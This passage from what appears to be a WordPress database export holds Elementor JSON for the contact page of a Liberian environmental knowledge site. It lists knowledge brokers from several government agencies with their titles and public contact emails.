/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23191,3358,'_elementor_edit_mode','builder'),(23192,3358,'_elementor_template_type','wp-page'),(23193,3358,'_elementor_version','3.0.16'),(23194,3358,'_wp_page_template','default'),(23195,3358,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nof